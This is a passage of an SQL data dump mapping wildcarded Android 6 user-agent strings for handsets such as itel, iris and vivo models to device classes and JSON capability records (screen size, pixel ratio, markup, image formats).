Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; bravis_A506) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; bravis_A553) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; d-01J) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_mozilla','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":640,\"screenHeight\":1024,\"pixelRatio\":2.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; dtac_Phone_S2) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; eSmart M3) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; elink8735b_6tb_m) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_mozilla','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":800,\"screenHeight\":1280,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; gxq6580_we_m) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; hi6210sft) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; hi6250) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; i10) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; i4) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":384,\"screenHeight\":768,\"pixelRatio\":1.25,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; i50) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; i5030) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; i5031) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; i5530) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; i5K) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; i7) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_mozilla','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":600,\"screenHeight\":1024,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; iQ1517) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; iQ1518) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; iQ1910) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; iQ1950) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; iQ5017) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; iQ5017M) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; iQP50) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; iQR300) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; iQW553) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; ifive mini 4S) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_mozilla','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":768,\"screenHeight\":1024,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; iris 820) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_iris','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; iris 870 4G) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_iris','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; iris 870) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_iris','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; iris41) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_iris','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; iris50) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_iris','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; iris702) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_iris','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; iris870) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_iris','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; itel A11) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_itel','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; itel A12) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_itel','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; itel A41) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_itel','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; itel A51) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_itel','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; itel P12) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_itel','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; itel S11) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_itel','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; itel S11Plus) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_itel','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; itel S31) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_itel','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; itel W5001P) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_itel','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; itel it1409) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_itel','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; itel it1513) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_itel','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; itel_S11) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_itel','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; lephone_W7) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; lephone_W8) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; thl T9 Pro) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; thor) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; tommy) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; verykoolS5027) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; verykoolSL5050) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; verykools4513) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; verykools5027) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; verykools5028) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; verykools5526) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; verykools5527) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; vivo 1601) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_vivo','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; vivo 1603) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_vivo','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; vivo 1606) AppleWebKit/* (KHTML, like Gecko)','android_vivo','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; vivo 1606) AppleWebKit/* (KHTML, like Gecko) Chrome','android_vivo','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; vivo 1606) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_vivo','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; vivo 1606A) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_vivo','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; vivo 1609) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_vivo','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; vivo 1610) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_vivo','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; vivo 1611) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_vivo','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; vivo 1612) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_vivo','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; vivo 1713) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_vivo','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; vivo Y55) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_vivo','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; vivo Y67) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_vivo','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; vivo_1606) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; x600) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; xx 2) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; xx Note 2) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":393,\"screenHeight\":698,\"pixelRatio\":2.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; xx X520) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; xx X522) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; xx X526) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; xx X527) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; xx X52x) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; xx X620) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; xx X622) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; xx X625) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; xx X626) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; xx X820) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; xx X821) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile 